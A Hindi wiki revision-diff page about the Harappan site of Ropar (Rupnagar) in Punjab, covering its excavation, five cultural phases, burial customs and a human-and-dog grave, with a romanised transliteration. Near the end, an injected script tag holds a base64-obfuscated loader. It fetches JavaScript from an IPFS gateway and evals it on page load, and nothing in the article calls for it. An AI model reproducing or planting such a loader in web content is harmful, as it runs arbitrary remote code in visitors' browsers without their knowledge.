Difference between revisions of "रोपड़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
m (Text replacement - "हुयी " to "हुई ")
 
Line 7: Line 7:
 
यहाँ पर [[हड़प्पा]] पूर्व एवं हड़प्पाकालीन संस्कृतियो के [[अवशेष]] मिले है। इस स्थल की खुदाई 1953-56 में 'यज्ञ दत्त शर्मा' के द्वारा की गई थी। यहाँ प्राप्त मिट्टी के बर्तन, [[आभूषण]] चर्ट, फलग एवं [[तांबा|तांबे]] की [[कुल्हाड़ी]] महत्त्वपूर्ण है। यहाँ पर मिले मकानों के अवशेषों से लगता है कि यहाँ के मकान पत्थर एवं [[मिट्टी]] से बनाये गये थे।  
 
यहाँ पर [[हड़प्पा]] पूर्व एवं हड़प्पाकालीन संस्कृतियो के [[अवशेष]] मिले है। इस स्थल की खुदाई 1953-56 में 'यज्ञ दत्त शर्मा' के द्वारा की गई थी। यहाँ प्राप्त मिट्टी के बर्तन, [[आभूषण]] चर्ट, फलग एवं [[तांबा|तांबे]] की [[कुल्हाड़ी]] महत्त्वपूर्ण है। यहाँ पर मिले मकानों के अवशेषों से लगता है कि यहाँ के मकान पत्थर एवं [[मिट्टी]] से बनाये गये थे।  
  
यहाँ शवों को अण्डाकार गढ्ढों में दफनाया जाता था। एक स्थान से शवाधान के लिए प्रयोग होने वाले ईटों का एक छोटा कमरा भी मिला है। कुछ शवाधान से मिट्टी के पकाए गए आभूषण, [[शंख]] की चूड़ियां, गोमेद पत्थर के मनके, तांबे की अंगूठियां आदि प्राप्त हुयी हैं।  
+
यहाँ शवों को अण्डाकार गढ्ढों में दफनाया जाता था। एक स्थान से शवाधान के लिए प्रयोग होने वाले ईटों का एक छोटा कमरा भी मिला है। कुछ शवाधान से मिट्टी के पकाए गए आभूषण, [[शंख]] की चूड़ियां, गोमेद पत्थर के मनके, तांबे की अंगूठियां आदि प्राप्त हुई हैं।  
  
 
रोपड़ से एक ऐसा क़ब्रिस्तान मिला है जिसमें मनुष्य के साथ पालतू कुत्ता भी दफनाया गया था। ऐसा उदाहरण किसी भी हड़प्पाकालीन स्थल से प्राप्त नहीं हुआ है। परन्तु इस प्रकार की प्रथम [[नव पाषाण काल|नव पाषाण युग]] में '[[बुर्ज़होम]]' ([[कश्मीर]]) में प्रचलित थी।
 
रोपड़ से एक ऐसा क़ब्रिस्तान मिला है जिसमें मनुष्य के साथ पालतू कुत्ता भी दफनाया गया था। ऐसा उदाहरण किसी भी हड़प्पाकालीन स्थल से प्राप्त नहीं हुआ है। परन्तु इस प्रकार की प्रथम [[नव पाषाण काल|नव पाषाण युग]] में '[[बुर्ज़होम]]' ([[कश्मीर]]) में प्रचलित थी।

Latest revision as of 07:41, 7 November 2017

panjab pradesh ke 'rop d zile' mean sataluj nadi ke baane tat par sthit hai. yahaan svatantrata prapti ke pashchath sarvapratham utkhanan kiya gaya tha. isaka adhunik nam 'roop nagar' tha. 1950 mean isaki khoj 'bi.bi.lal' ne ki thi. yahaan sanskriti ke paanch charan milate haian jo is prakar hai -

  1. h dappa
  2. chitrit dhoosar mridabhaand
  3. uttari kale palish vale
  4. kushan, gupt
  5. madhyakalin mridabhaand

yahaan par h dappa poorv evan h dappakalin sanskritiyo ke avashesh mile hai. is sthal ki khudaee 1953-56 mean 'yajn datt sharma' ke dvara ki gee thi. yahaan prapt mitti ke bartan, abhooshan chart, phalag evan taanbe ki kulha di mahattvapoorn hai. yahaan par mile makanoan ke avasheshoan se lagata hai ki yahaan ke makan patthar evan mitti se banaye gaye the.

yahaan shavoan ko andakar gadhdhoan mean daphanaya jata tha. ek sthan se shavadhan ke lie prayog hone vale eetoan ka ek chhota kamara bhi mila hai. kuchh shavadhan se mitti ke pakae ge abhooshan, shankh ki choo diyaan, gomed patthar ke manake, taanbe ki aangoothiyaan adi prapt huee haian.

rop d se ek aisa qabristan mila hai jisamean manushy ke sath palatoo kutta bhi daphanaya gaya tha. aisa udaharan kisi bhi h dappakalin sthal se prapt nahian hua hai. parantu is prakar ki pratham nav pashan yug mean 'burzahom' (kashmir) mean prachalit thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh